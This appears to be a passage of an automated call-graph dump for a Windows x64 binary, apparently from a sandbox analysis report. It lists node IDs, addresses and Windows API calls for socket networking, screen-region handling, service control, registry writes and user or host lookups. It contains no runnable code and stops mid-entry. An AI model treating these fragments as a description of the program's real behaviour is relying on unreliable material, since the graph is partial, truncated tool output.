7ff6dc129d80 23795->23821 23800 7ff6dc0c3730 _RunAllParam 89 API calls 23796->23800 23797->23796 23799 7ff6dc129f47 GetUserObjectInformationA GetLastError SetLastError 23797->23799 23802 7ff6dc129f79 RevertToSelf 23799->23802 23803 7ff6dc129fae 23799->23803 23805 7ff6dc12a0a9 23800->23805 23808 7ff6dc0c3730 _RunAllParam 89 API calls 23802->23808 23803->23794 23804 7ff6dc129fb7 23803->23804 23809 7ff6dc0c3730 _RunAllParam 89 API calls 23804->23809 23805->23768 23806 7ff6dc12a000 GetUserNameA 23807 7ff6dc12a06f 23806->23807 23811 7ff6dc12a012 GetLastError 23806->23811 23810 7ff6dc0c3730 _RunAllParam 89 API calls 23807->23810 23812 7ff6dc129fa1 23808->23812 23813 7ff6dc129fcc 23809->23813 23814 7ff6dc12a087 23810->23814 23815 7ff6dc12a01f 23811->23815 23816 7ff6dc12a044 GetLastError 23811->23816 23812->23768 23813->23768 23814->23768 23817 7ff6dc0c3730 _RunAllParam 89 API calls 23815->23817 23818 7ff6dc0c3730 _RunAllParam 89 API calls 23816->23818 23820 7ff6dc12a034 23817->23820 23819 7ff6dc12a062 23818->23819 23819->23768 23820->23768 23822 7ff6dc129bc0 84 API calls 23821->23822 23823 7ff6dc129da3 23822->23823 23824 7ff6dc129da7 23823->23824 23825 7ff6dc129dae OpenProcess OpenProcessToken 23823->23825 23831 7ff6dc177220 _getdrive 8 API calls 23824->23831 23826 7ff6dc129de7 GetTokenInformation 23825->23826 23827 7ff6dc129de0 23825->23827 23829 7ff6dc129ea9 CloseHandle 23826->23829 23830 7ff6dc129e16 LookupAccountSidA CloseHandle CloseHandle 23826->23830 23828 7ff6dc129eb7 CloseHandle 23827->23828 23828->23824 23829->23828 23830->23824 23832 7ff6dc129eda 23831->23832 23832->23806 23832->23807 23834 7ff6dc17970d 23833->23834 23835 7ff6dc179731 23833->23835 23834->23835 23836 7ff6dc17ffc8 _errno 70 API calls 23834->23836 23837 7ff6dc179717 23836->23837 23838 7ff6dc1849d4 _invalid_parameter_noinfo 17 API calls 23837->23838 23839 7ff6dc179722 23838->23839 23839->23783 23870 7ff6dc0c4790 DeleteCriticalSection 23871 7ff6dc0ef790 96 API calls 2 library calls 23872 7ff6dc0e9390 121 API calls _RunAllParam 23874 7ff6dc0cd790 11 API calls _getdrive 23876 7ff6dc0d8190 125 API calls _RunAllParam 23877 7ff6dc0ee780 97 API calls __wtomb_environ 23878 7ff6dc0e4003 210 API calls 2 library calls 23880 7ff6dc0ccf80 120 API calls 4 library calls 23881 7ff6dc0cf780 71 API calls __wtomb_environ 23882 7ff6dc0ddd80 121 API calls 23883 7ff6dc0dbb80 122 API calls 2 library calls 23885 7ff6dc0ea9b0 114 API calls _getdrive 23886 7ff6dc0eebb0 71 API calls 23887 7ff6dc0cffb0 SetRectRgn SetRectRgn SetRectRgn 23889 7ff6dc0e05b0 168 API calls _RunAllParam 23890 7ff6dc0c81ad 272 API calls 2 library calls 23892 7ff6dc0f13a0 7 API calls 23894 7ff6dc0d9ba0 SetEvent Sleep Sleep 23895 7ff6dc0e4003 259 API calls 3 library calls 23896 7ff6dc0c55d0 72 API calls sprintf 23897 7ff6dc0e4003 213 API calls 2 library calls 23901 7ff6dc0e4003 222 API calls 2 library calls 23898 7ff6dc0d1bd0 FreeLibrary 23899 7ff6dc0cf7d0 DeleteObject 22904 7ff6dc0df7d0 22905 7ff6dc0df803 22904->22905 22906 7ff6dc0df80d 22904->22906 22910 7ff6dc0e84f0 22905->22910 22913 7ff6dc157a70 22906->22913 22924 7ff6dc0e8590 22910->22924 22918 7ff6dc157a8a 22913->22918 22914 7ff6dc157ae5 CloseHandle 22915 7ff6dc157aef GetLastError 22914->22915 22922 7ff6dc157b0a 22914->22922 22919 7ff6dc182950 RaiseException 22915->22919 22916 7ff6dc157b3d DeleteCriticalSection 22917 7ff6dc157b17 CloseHandle 22917->22916 22920 7ff6dc157b21 GetLastError 22917->22920 22918->22914 22918->22922 22919->22922 22921 7ff6dc182950 RaiseException 22920->22921 22923 7ff6dc157b3c 22921->22923 22922->22916 22922->22917 22923->22916 22954 7ff6dc0c3730 22924->22954 22927 7ff6dc0e8628 22930 7ff6dc0e8656 22927->22930 22931 7ff6dc178bf4 free 70 API calls 22927->22931 22928 7ff6dc0e8612 22928->22927 22958 7ff6dc0d4110 22928->22958 22929 7ff6dc0e85eb SendMessageA WaitForSingleObject 22929->22928 22932 7ff6dc0c3730 _RunAllParam 89 API calls 22930->22932 22937 7ff6dc0e867e _RunAllParam 22930->22937 22931->22930 22932->22937 22933 7ff6dc0e8757 22934 7ff6dc0e8768 22933->22934 22935 7ff6dc178bf4 free 70 API calls 22933->22935 22936 7ff6dc0e8779 22934->22936 22938 7ff6dc178bf4 free 70 API calls 22934->22938 22935->22934 22940 7ff6dc0e87b5 FreeLibrary 22936->22940 22944 7ff6dc0e87bc _RunAllParam 22936->22944 22937->22933 22961 7ff6dc12a220 FindWindowExA GetWindowThreadProcessId GetCurrentProcessId 22937->22961 22938->22936 22940->22944 22941 7ff6dc0e873b 22941->22933 22942 7ff6dc0e8740 SendMessageA 22941->22942 22942->22933 22943 7ff6dc0e87ea DeleteObject 22945 7ff6dc178bf4 free 70 API calls 22943->22945 22944->22943 22946 7ff6dc0e881c DeleteObject 22945->22946 22947 7ff6dc178bf4 free 70 API calls 22946->22947 22948 7ff6dc0e8844 DeleteObject 22947->22948 22949 7ff6dc178bf4 free 70 API calls 22948->22949 22950 7ff6dc0e885d DeleteObject 22949->22950 22951 7ff6dc178bf4 free 70 API calls 22950->22951 22952 7ff6dc0e8876 22951->22952 22955 7ff6dc0c3765 22954->22955 22956 7ff6dc0c3746 22954->22956 22955->22927 22955->22928 22955->22929 22956->22955 22962 7ff6dc113740 89 API calls 3 library calls 22956->22962 22963 7ff6dc0d4140 22958->22963 22960 7ff6dc0d4124 22960->22927 22961->22941 22962->22955 22966 7ff6dc0d415c _RunAllParam 22963->22966 22964 7ff6dc0d41b4 SendMessageA 22965 7ff6dc0d41c6 22964->22965 22967 7ff6dc0d41d5 22965->22967 22968 7ff6dc0d41cf FreeLibrary 22965->22968 22966->22964 22966->22965 22967->22960 22968->22967 23902 7ff6dc0db3d0 96 API calls 2 library calls 23903 7ff6dc0c55c0 LeaveCriticalSection 23904 7ff6dc0c47c0 12 API calls 23909 7ff6dc0e4003 254 API calls 2 library calls 23910 7ff6dc0e4003 240 API calls 3 library calls 23911 7ff6dc0c65f1 8 API calls _getdrive 23912 7ff6dc17e9bc 81 API calls 2 library calls 23913 7ff6dc0edbf0 13 API calls _RunAllParam 23914 7ff6dc0eebf0 141 API calls 2 library calls 23916 7ff6dc0d03f0 CombineRgn 23290 7ff6dc12cbc0 23291 7ff6dc12cbd7 23290->23291 23292 7ff6dc12cbdc socket 23290->23292 23299 7ff6dc12cc40 23291->23299 23294 7ff6dc12cbfb setsockopt 23292->23294 23295 7ff6dc12cbf3 23292->23295 23294->23295 23296 7ff6dc12cc20 23294->23296 23297 7ff6dc12cf90 14 API calls 23296->23297 23298 7ff6dc12cc28 23297->23298 23300 7ff6dc12cc87 23299->23300 23301 7ff6dc12cc4f 23299->23301 23300->23292 23302 7ff6dc0c3730 _RunAllParam 89 API calls 23301->23302 23303 7ff6dc12cc67 shutdown closesocket 23302->23303 23303->23300 23917 7ff6dc0c79e9 75 API calls 3 library calls 23918 7ff6dc0e89e0 93 API calls _RunAllParam 23919 7ff6dc0d09e0 82 API calls 2 library calls 23920 7ff6dc0d3be0 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey RegCloseKey 23921 7ff6dc0ddde0 152 API calls 23923 7ff6dc117bd0 21 API calls _getdrive 23927 7ff6dc0d0010 74 API calls free 23928 7ff6dc0d3210 18 API calls _getdrive 23930 7ff6dc0d4c10 137 API calls 3 library calls 22969 7ff6dc0de610 22970 7ff6dc1792a4 __wtomb_environ 70 API calls 22969->22970 22971 7ff6dc0de67f CreateRectRgn 22970->22971 22972 7ff6dc1792a4 __wtomb_environ 70 API calls 22971->22972 22973 7ff6dc0de6a3 CreateRectRgn 22972->22973 22974 7ff6dc1792a4 __wtomb_environ 70 API calls 22973->22974 22975 7ff6dc0de6c7 CreateRectRgn 22974->22975 22976 7ff6dc0c3730 _RunAllParam 89 API calls 22975->22976 23022 7ff6dc0de70a _RunAllParam 22976->23022 22977 7ff6dc0df70d 22978 7ff6dc0c3730 _RunAllParam 89 API calls 22977->22978 22979 7ff6dc0df725 22978->22979 22981 7ff6dc0c3730 _RunAllParam 89 API calls 22979->22981 22980 7ff6dc0de740 Sleep 23030 7ff6dc0de752 22980->23030 22982 7ff6dc0df741 DeleteObject 22981->22982 22984 7ff6dc178bf4 free 70 API calls 22982->22984 22983 7ff6dc0de773 EnterCriticalSection 22983->23022 22985 7ff6dc0df760 DeleteObject 22984->22985 22986 7ff6dc178bf4 free 70 API calls 22985->22986 22987 7ff6dc0df773 DeleteObject 22986->22987 22992 7ff6dc178bf4 free 70 API calls 22987->22992 22988 7ff6dc0deab4 DeleteObject 22989 7ff6dc178bf4 free 70 API calls 22988->22989 22989->23022 22990 7ff6dc0dead7 DeleteObject 22993 7ff6dc178bf4 free 70 API calls 22990->22993 22991 7ff6dc0de8cb DeleteObject 22994 7ff6dc178bf4 free 70 API calls 22991->22994 22998 7ff6dc0df786 22992->22998 22993->23022 22994->23022 22995 7ff6dc0deafa DeleteObject 23000 7ff6dc178bf4 free 70 API calls 22995->23000 22996 7ff6dc0de8ee DeleteObject 23001 7ff6dc178bf4 free 70 API calls 22996->23001 23004 7ff6dc177220 _getdrive 8 API calls 22998->23004 23000->23022 23001->23022 23002 7ff6dc0de9a6 GetRgnBox 23002->23022 23003 7ff6dc0de911 DeleteObject 23007 7ff6dc178bf4 free 70 API calls 23003->23007 23008 7ff6dc0df7a2 23004->23008 23005 7ff6dc0de7e6 GetRgnBox 23005->23022 23006 7ff6dc1575c0 104 API calls 23006->23022 23007->23022 23009 7ff6dc0df704 LeaveCriticalSection 23009->22977 23010 7ff6dc157400 97 API calls 23010->23022 23013 7ff6dc0de9f3 GetRgnBox 23013->23022 23014 7ff6dc0de833 GetRgnBox 23014->23022 23015 7ff6dc12d440 16 API calls 23015->23022 23016 7ff6dc1792a4 __wtomb_environ 70 API calls 23018 7ff6dc0debb3 CreateRectRgn CombineRgn 23016->23018 23031 7ff6dc0dec05 23018->23031 23019 7ff6dc0dea40 GetRgnBox 23019->23022 23021 7ff6dc0df6b8 SetRectRgn 23025 7ff6dc0df6da LeaveCriticalSection Sleep 23021->23025 23022->22977 23022->22980 23022->22983 23022->22988 23022->22990 23022->22991 23022->22995 23022->22996 23022->23003 23022->23006 23022->23009 23022->23010 23022->23015 23022->23016 23022->23021 23027 7ff6dc1792a4 __wtomb_environ 70 API calls 23022->23027 23028 7ff6dc1792a4 __wtomb_environ 70 API calls 23022->23028 23029 7ff6dc0c3730 89 API calls _RunAllParam 23022->23029 23022->23030 23033 7ff6dc0df60b GetTickCount 23022->23033 23044 7ff6dc12cc40 91 API calls 23022->23044 23045 7ff6dc12d710 15 API calls 23022->23045 23046 7ff6dc0cf840 73 API calls __wtomb_environ 23022->23046 23047 7ff6dc0cf840 73 API calls __wtomb_environ 23022->23047 23048 7ff6dc0cf840 73 API calls __wtomb_environ 23022->23048 23049 7ff6dc0cf840 73 API calls __wtomb_environ 23022->23049 23050 7ff6dc0cf840 73 API calls __wtomb_environ 23022->23050 23051 7ff6dc0cf840 73 API calls __wtomb_environ 23022->23051 23053 7ff6dc12d600 14 API calls 23022->23053 23062 7ff6dc12ded0 8 API calls 2 library calls 23022->23062 23063 7ff6dc0ea580 99 API calls _RunAllParam 23022->23063 23024 7ff6dc0de87c GetRgnBox 23024->23022 23025->23022 23026 7ff6dc0df702 23025->23026 23026->22977 23034 7ff6dc0defdf CreateRectRgn CombineRgn DeleteObject 23027->23034 23035 7ff6dc0df120 CreateRectRgn CombineRgn DeleteObject 23028->23035 23029->23022 23030->22980 23030->23021 23030->23022 23030->23025 23032 7ff6dc0dec20 SetEvent 23031->23032 23052 7ff6dc0e8e00 120 API calls 23031->23052 23032->23031 23054 7ff6dc12dd90 23033->23054 23038 7ff6dc178bf4 free 70 API calls 23034->23038 23040 7ff6dc178bf4 free 70 API calls 23035->23040 23038->23022 23040->23022 23041 7ff6dc0dec4a DeleteObject 23042 7ff6dc178bf4 free 70 API calls 23041->23042 23042->23022 23044->23022 23045->23022 23046->23005 23047->23014 23048->23024 23049->23002 23050->23013 23051->23019 23052->23041 23053->23022 23058 7ff6dc12ddd4 23054->23058 23059 7ff6dc12de3d 23054->23059 23055 7ff6dc12ddf0 select 23055->23058 23056 7ff6dc177220 _getdrive 8 API calls 23057 7ff6dc12dea6 23056->23057 23057->23030 23058->23055 23058->23059 23060 7ff6dc12de55 __WSAFDIsSet 23058->23060 23059->23056 23060->23058 23061 7ff6dc12de67 send 23060->23061 23061->23058 23062->23022 23063->23022 23931 7ff6dc0dda10 82 API calls 2 library calls 23933 7ff6dc0c1000 70 API calls free 23934 7ff6dc0d5203 16 API calls _getdrive 23936 7ff6dc0c4200 121 API calls 2 library calls 23937 7ff6dc0f3600 9 API calls _getdrive 23938 7ff6dc0f5000 71 API calls free 23939 7ff6dc0ca600 100 API calls _RunAllParam 23940 7ff6dc0d0e00 82 API calls 3 library calls 23945 7ff6dc17c034 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 23947 7ff6dc0e4003 237 API calls 3 library calls 23948 7ff6dc0f3430 201 API calls 23949 7ff6dc0ca830 91 API calls 2 library calls 23953 7ff6dc0ea420 15 API calls _getdrive 23956 7ff6dc0cd820 8 API calls _RunAllParam 23957 7ff6dc0e1620 150 API calls 5 library calls 23959 7ff6dc117e10 20 API calls _getdrive 23962 7ff6dc0c1450 RaiseException 23964 7ff6dc0d2a50 SetServiceStatus 23965 7ff6dc0f5040 SetRectRgn CombineRgn DeleteObject 23966 7ff6dc0f1440 126 API calls _RunAllParam 23967 7ff6dc0e4003 255 API calls 3 library calls 23968 7ff6dc0e4003 223 API calls 2 library calls 23971 7ff6dc0c1a70 CloseClipboard 23974 7ff6dc0d2a6e SetServiceStatus SetEvent SetEvent 23975 7ff6dc0e8a70 133 API calls 4 library calls 23978 7ff6dc0e4003 251 API calls 2 library calls 23979 7ff6dc0c3e60 34 API calls 23980 7ff6dc0c6060 112 API calls 2 library calls 23982 7ff6dc0c5a60 25 API calls 2 library calls 23984 7ff6dc0e9060 129 API calls 23986 7ff6dc0f5a60 8 API calls 23987 7ff6dc0f3460 122 API calls 2 library calls 23990 7ff6dc0da890 97 API calls 2 library calls 23991 7ff6dc143ca0 75 API calls 3 library calls 23993 7ff6dc0ea085 98 API calls 23995 7ff6dc0e9480 117 API calls _RunAllParam 23996 7ff6dc0d2880 196 API calls 23997 7ff6dc0cd880 6 API calls _RunAllParam 24000 7ff6dc0ca6b0 93 API calls 2 library calls 24003 7ff6dc0d3cb0 RegCreateKeyExA RegOpenKeyExA RegDeleteValueA RegCloseKey RegCloseKey 24004 7ff6dc0d34b0 13 API calls _getdrive 24008 7ff6dc125e80 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 22670 7ff6dc0e88a0 getpeername inet_ntoa 22682 7ff6dc1792a4 22670->22682 22675 7ff6dc0e893d InitializeCriticalSection 22708 7ff6dc1579a0 EnterCriticalSection LeaveCriticalSection CreateSemaphoreA GetLastError RaiseException 22675->22708 22677 7ff6dc0e895e 22678 7ff6dc0e8988 22677->22678 22704 7ff6dc0df840 22677->22704 22709 7ff6dc177220 22678->22709 22680 7ff6dc0e89c3 22683 7ff6dc1792bb malloc 22682->22683 22689 7ff6dc0e8913 22682->22689 22720 7ff6dc178c34 22683->22720 22687 7ff6dc1792e3 22688 7ff6dc1792ec 22687->22688 22687->22689 22738 7ff6dc184930 16 API calls _invalid_parameter_noinfo 22688->22738 22692 7ff6dc177978 22689->22692 22695 7ff6dc177983 22692->22695 22693 7ff6dc178c34 malloc 70 API calls 22693->22695 22694 7ff6dc0e8930 22694->22675 22694->22677 22695->22693 22695->22694 22696 7ff6dc183238 _callnewh DecodePointer 22695->22696 22700 7ff6dc1779a2 22695->22700 22696->22695 22697 7ff6dc1779f3 22796 7ff6dc17755c 70 API calls std::exception::operator= 22697->22796 22699 7ff6dc177a04 22797 7ff6dc182950 22699->22797 22700->22697 22795 7ff6dc177b94 80 API calls 22700->22795 22703 7ff6dc177a1a 22705 7ff6dc0df885 22704->22705 22800 7ff6dc157b50 EnterCriticalSection 22705->22800 22707 7ff6dc0df926 22707->22678 22708->22677 22710 7ff6dc177229 22709->22710 22711 7ff6dc177234 22710->22711 22712 7ff6dc1829e4 RtlCaptureContext RtlLookupFunctionEntry 22710->22712 22711->22680 22713 7ff6dc182a69 22712->22713 22714 7ff6dc182a28 RtlVirtualUnwind 22712->22714 22715 7ff6dc182a8b IsDebuggerPresent 22713->22715 22714->22715 22856 7ff6dc18dc94 22715->22856 22717 7ff6dc182aea SetUnhandledExceptionFilter UnhandledExceptionFilter 22718 7ff6dc182b08 _getdrive 22717->22718 22719 7ff6dc182b12 GetCurrentProcess TerminateProcess 22717->22719 22718->22719 22719->22680 22721 7ff6dc178c4c 22720->22721 22722 7ff6dc178cc8 22720->22722 22724 7ff6dc178c84 HeapAlloc 22721->22724 22725 7ff6dc178c64 22721->22725 22730 7ff6dc178cad 22721->22730 22734 7ff6dc178cb2 22721->22734 22742 7ff6dc183238 DecodePointer 22721->22742 22723 7ff6dc183238 _callnewh DecodePointer 22722->22723 22726 7ff6dc178ccd 22723->22726 22724->22721 22729 7ff6dc178cbd 22724->22729 22725->22724 22739 7ff6dc182ed0 70 API calls 2 library calls 22725->22739 22740 7ff6dc182c70 70 API calls 4 library calls 22725->22740 22741 7ff6dc17abd8 GetModuleHandleW GetProcAddress ExitProcess _amsg_exit 22725->22741 22728 7ff6dc17ffc8 _errno 69 API calls 22726->22728 22728->22729 22729->22689 22737 7ff6dc177de8 70 API calls 2 library calls 22729->22737 22744 7ff6dc17ffc8 22730->22744 22736 7ff6dc17ffc8 _errno 69 API calls 22734->22736 22736->22729 22737->22687 22739->22725 22740->22725 22743 7ff6dc183253 22742->22743 22743->22721 22747 7ff6dc1837c4 GetLastError FlsGetValue 22744->22747 22746 7ff6dc17ffd1 22746->22734 22748 7ff6dc1837ea 22747->22748 22749 7ff6dc183832 SetLastError 22747->22749 22759 7ff6dc1832ec 22748->22759 22749->22746 22752 7ff6dc1837ff FlsSetValue 22753 7ff6dc18382b 22752->22753 22754 7ff6dc183815 22752->22754 22773 7ff6dc178bf4 22753->22773 22764 7ff6dc18370c 22754->22764 22758 7ff6dc183830 22758->22749 22760 7ff6dc183311 22759->22760 22762 7ff6dc183351 22760->22762 22763 7ff6dc18332f Sleep 22760->22763 22779 7ff6dc189234 22760->22779 22762->22749 22762->22752 22763->22760 22763->22762 22787 7ff6dc1877d0 22764->22787 22766 7ff6dc183765 22767 7ff6dc1876d0 __tzset LeaveCriticalSection 22766->22767 22768 7ff6dc18377a 22767->22768 22769 7ff6dc1877d0 _lock 70 API calls 22768->22769 22770 7ff6dc183784 __doserrno 22769->22770 22771 7ff6dc1876d0 __tzset LeaveCriticalSection 22770->22771 22772 7ff6dc1837b6 GetCurrentThreadId 22771->22772 22772->22749 22774 7ff6dc178bf9 RtlFreeHeap 22773->22774 22778 7ff6dc178c29 free 22773->22778 22775 7ff6dc178c14 22774->22775 22774->22778 22776 7ff6dc17ffc8 _errno 68 API calls 22775->22776 22777 7ff6dc178c19 GetLastError 22776->22777 22777->22778 22778->22758 22780 7ff6dc189249 22779->22780 22784 7ff6dc189266 22779->22784 22781 7ff6dc189257 22780->22781 22780->22784 22782 7ff6dc17ffc8 _errno 69 API calls 22781->22782 22785 7ff6dc18925c 22782->22785 22783 7ff6dc18927e HeapAlloc 22783->22784 22783->22785 22784->22783 22784->22785 22786 7ff6dc183238 _callnewh DecodePointer 22784->22786 22785->22760 22786->22784 22788 7ff6dc1877ff EnterCriticalSection 22787->22788 22789 7ff6dc1877ee 22787->22789 22793 7ff6dc1876e8 70 API calls 6 library calls 22789->22793 22791 7ff6dc1877f3 22791->22788 22794 7ff6dc17af34 70 API calls 6 library calls 22791->22794 22793->22791 22794->22788 22795->22697 22796->22699 22798 7ff6dc18297e 22797->22798 22799 7ff6dc1829bd RaiseException 22798->22799 22799->22703 22801 7ff6dc157b6d 22800->22801 22802 7ff6dc157b84 22800->22802 22803 7ff6dc182950 RaiseException 22801->22803 22820 7ff6dc18285c 22802->22820 22803->22802 22806 7ff6dc157bc9 GetLastError 22807 7ff6dc182950 RaiseException 22806->22807 22810 7ff6dc157be4 22807->22810 22808 7ff6dc157c0b 22809 7ff6dc157c18 SetThreadPriority 22808->22809 22811 7ff6dc157c27 GetLastError 22809->22811 22812 7ff6dc157c43 ResumeThread 22809->22812 22810->22808 22810->22809 22813 7ff6dc182950 RaiseException 22810->22813 22814 7ff6dc182950 RaiseException 22811->22814 22815 7ff6dc157c52 GetLastError 22812->22815 22816 7ff6dc157c6e LeaveCriticalSection 22812->22816 22813->22808 22818 7ff6dc157c42 22814->22818 22817 7ff6dc182950 RaiseException 22815->22817 22816->22707 22819 7ff6dc157c6d 22817->22819 22818->22812 22819->22816 22821 7ff6dc18289c 22820->22821 22822 7ff6dc182887 22820->22822 22826 7ff6dc1832ec __wtomb_environ 70 API calls 22821->22826 22823 7ff6dc17ffc8 _errno 70 API calls 22822->22823 22824 7ff6dc18288c 22823->22824 22843 7ff6dc1849d4 22824->22843 22828 7ff6dc1828b0 22826->22828 22827 7ff6dc157bb9 22827->22806 22827->22810 22829 7ff6dc182920 22828->22829 22838 7ff6dc183848 22828->22838 22830 7ff6dc178bf4 free 70 API calls 22829->22830 22833 7ff6dc182928 22830->22833 22833->22827 22846 7ff6dc180008 70 API calls 2 library calls 22833->22846 22834 7ff6dc18370c __doserrno 70 API calls 22835 7ff6dc1828cc CreateThread 22834->22835 22835->22827 22837 7ff6dc182918 GetLastError 22835->22837 22837->22829 22839 7ff6dc1837c4 __doserrno 70 API calls 22838->22839 22840 7ff6dc183853 22839->22840 22841 7ff6dc1828bd 22840->22841 22847 7ff6dc17af34 70 API calls 6 library calls 22840->22847 22841->22834 22848 7ff6dc184964 DecodePointer 22843->22848 22846->22827 22847->22841 22849 7ff6dc1849c3 22848->22849 22850 7ff6dc1849a2 22848->22850 22855 7ff6dc184930 16 API calls _invalid_parameter_noinfo 22849->22855 22850->22827 22856->22717 24011 7ff6dc0f54a0 109 API calls 4 library calls 24012 7ff6dc0f5ca0 331 API calls 4 library calls 24013 7ff6dc0dcca0 115 API calls 24019 7ff6dc0c28d0 81 API calls 24021 7ff6dc0e8ed0 127 API calls _getdrive 24022 7ff6dc0d00d0 88 API calls 2 library calls 23064 7ff6dc0e36d0 SetErrorMode 23065 7ff6dc0e3734 23064->23065 23066 7ff6dc0c3730 _RunAllParam 89 API calls 23065->23066 23067 7ff6dc0e3764 GetCurrentThreadId GetThreadDesktop 23066->23067 23068 7ff6dc0e3799 23067->23068 23195 7ff6dc0e33a0 23068->23195 23069 7ff6dc0e37b4 23106 7ff6dc0e39df 23069->23106 23207 7ff6dc0df940 23069->23207 23071 7ff6dc0e39ea 23072 7ff6dc0c3730 _RunAllParam 89 API calls 23071->23072 23080 7ff6dc0e3a11 23072->23080 23073 7ff6dc177220 _getdrive 8 API calls 23074 7ff6dc0e7ff0 23073->23074 23075 7ff6dc0e37ce 23223 7ff6dc17851c 23075->23223 23077 7ff6dc0e3825 23078 7ff6dc1792a4 __wtomb_environ 70 API calls 23077->23078 23079 7ff6dc0e3838 23078->23079 23081 7ff6dc1792a4 __wtomb_environ 70 API calls 23079->23081 23083 7ff6dc0e7ef3 23080->23083 23244 7ff6dc12d170 23080->23244 23082 7ff6dc0e3842 23081->23082 23229 7ff6dc12a320 23082->23229 23086 7ff6dc0c3730 _RunAllParam 89 API calls 23083->23086 23083->23106 23099 7ff6dc0e7f3e 23086->23099 23088 7ff6dc0e3a76 23090 7ff6dc0c3730 _RunAllParam 89 API calls 23088->23090 23089 7ff6dc0e3867 23093 7ff6dc178bf4 free 70 API calls 23089->23093 23094 7ff6dc0e3874 23089->23094 23092 7ff6dc0e3a8e timeGetTime 23090->23092 23091 7ff6dc178bf4 free 70 API calls 23091->23089 23095 7ff6dc0e3aaf 23092->23095 23093->23094 23096 7ff6dc0e3905 23094->23096 23098 7ff6dc0e38d0 SleepEx 23094->23098 23094->23106 23248 7ff6dc125f30 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 23095->23248 23101 7ff6dc0c3730 _RunAllParam 89 API calls 23096->23101 23098->23094 23098->23106 23255 7ff6dc12ab00 95 API calls _RunAllParam 23099->23255 23100 7ff6dc0e3abc 23102 7ff6dc0e3ac0 EnterCriticalSection 23100->23102 23105 7ff6dc0e3b17 _snprintf 23100->23105 23115 7ff6dc0e3947 23101->23115 23108 7ff6dc0e3af7 23102->23108 23107 7ff6dc0e3bd1 GetComputerNameA 23105->23107 23106->23073 23109 7ff6dc0e3c52 23107->23109 23117 7ff6dc0e3bec 23107->23117 23249 7ff6dc0daed0 89 API calls _snprintf 23108->23249 23111 7ff6dc0e3c83 gethostname 23109->23111 23120 7ff6dc0e3c57 23109->23120 23113 7ff6dc0e3caf 23111->23113 23111->23120 23112 7ff6dc0e3b0d LeaveCriticalSection 23112->23105 23251 7ff6dc0e3220 71 API calls 2 library calls 23113->23251 23234 7ff6dc12a290 23115->23234 23250 7ff6dc178e5c 70 API calls 4 library calls 23117->23250 23119 7ff6dc0e39c2 23119->23106 23122 7ff6dc0c3730 _RunAllParam 89 API calls 23119->23122 23252 7ff6dc12d710 15 API calls 23120->23252 23122->23106 23123 7ff6dc0e3ec4 23123->23106 23253 7ff6dc12d600 14 API calls 23123->23253 23125 7ff6dc0e3eed 23125->23106 23126 7ff6dc0c3730 _RunAllParam 89 API calls 23125->23126 23127 7ff6dc0e3f0d EnterCriticalSection 23126->23127 23129 7ff6dc1792a4 __wtomb_environ 70 API calls 23127->23129 23130 7ff6dc0e3f5f CreateRectRgn 23129->23130 23131 7ff6dc0e3f95 DeleteObject 23130->23131 23132 7ff6dc178bf4 free 70 API calls 23131->23132 23133 7ff6dc0e3faa LeaveCriticalSection 23132->23133 23254 7ff6dc157d90 EnterCriticalSection SetThreadPriority GetLastError LeaveCriticalSection RaiseException 23133->23254 23196 7ff6dc0e33c1 23195->23196 23197 7ff6dc12d170 2 API calls 23196->23197 23198 7ff6dc0e33cf 23197->23198 23199 7ff6dc0e33d3 GetLastError 23198->23199 23202 7ff6dc0e33f1 23198->23202 23200 7ff6dc0c3730 _RunAllParam 89 API calls 23199->23200 23200->23202 23201 7ff6dc0c3730 _RunAllParam 89 API calls 23203 7ff6dc0e351a 23201->23203 23204 7ff6dc0c3730 _RunAllParam 89 API calls 23202->23204 23205 7ff6dc0e3441 23202->23205 23203->23069 23204->23205 23205->23201 23206 7ff6dc0e349e 23205->23206 23206->23069 23219 7ff6dc0df980 23207->23219 23209 7ff6dc0dfae6 SleepEx 23209->23219 23210 7ff6dc0dfb50 23222 7ff6dc0dfb49 23210->23222 23271 7ff6dc178bbc 70 API calls swscanf 23210->23271 23211 7ff6dc177220 _getdrive 8 API calls 23213 7ff6dc0dfc50 23211->23213 23213->23071 23213->23075 23214 7ff6dc0dfb8c 23221 7ff6dc0c3730 _RunAllParam 89 API calls 23214->23221 23214->23222 23215 7ff6dc0dfa11 23215->23209 23215->23219 23270 7ff6dc12d890 97 API calls _RunAllParam 23215->23270 23217 7ff6dc0dfa5e EnterCriticalSection 23220 7ff6dc0dfa91 LeaveCriticalSection 23217->23220 23219->23209 23219->23210 23219->23215 23219->23217 23219->23222 23256 7ff6dc177c50 23219->23256 23262 7ff6dc12d1f0 GetTickCount 23219->23262 23220->23219 23221->23222 23222->23211 23225 7ff6dc17854e _snprintf 23223->23225 23224 7ff6dc17ffc8 _errno 70 API calls 23226 7ff6dc178558 23224->23226 23225->23224 23228 7ff6dc178563 23225->23228 23227 7ff6dc1849d4 _invalid_parameter_noinfo 17 API calls 23226->23227 23227->23228 23228->23077 23230 7ff6dc12a340 FindWindowExA 23229->23230 23231 7ff6dc12a35d GetWindowThreadProcessId GetCurrentProcessId 23230->23231 23232 7ff6dc0e3856 23230->23232 23231->23230 23233 7ff6dc12a37c PostMessageA 23231->23233 23232->23089 23232->23091 23232->23094 23233->23232 23235 7ff6dc12a2b0 23234->23235 23236 7ff6dc12a303 23234->23236 23235->23236 23237 7ff6dc12a2b9 FindWindowA 23235->23237 23238 7ff6dc12a340 FindWindowExA 23236->23238 23239 7ff6dc12a2dd PostMessageA 23237->23239 23240 7ff6dc12a2cd 23237->23240 23241 7ff6dc12a35d GetWindowThreadProcessId GetCurrentProcessId 23238->23241 23242 7ff6dc12a392 23238->23242 23239->23119 23240->23119 23241->23238 23243 7ff6dc12a37c PostMessageA 23241->23243 23242->23119 23243->23242 23245 7ff6dc12d18a setsockopt 23244->23245 23246 7ff6dc12d182 23244->23246 23245->23246 23247 7ff6dc12d1b5 setsockopt 23245->23247 23246->23088 23247->23088 23248->23100 23249->23112 23250->23109 23251->23120 23252->23123 23253->23125 23255->23106 23257 7ff6dc177c83 _snprintf 23256->23257 23258 7ff6dc17ffc8 _errno 70 API calls 23257->23258 23261 7ff6dc177c98 23257->23261 23259 7ff6dc177c8d 23258->23259 23260 7ff6dc1849d4 _invalid_parameter_noinfo 17 API calls 23259->23260 23260->23261 23261->23219 23263 7ff6dc12d22f 23262->23263 23264 7ff6dc12d2b6 23262->23264 23265 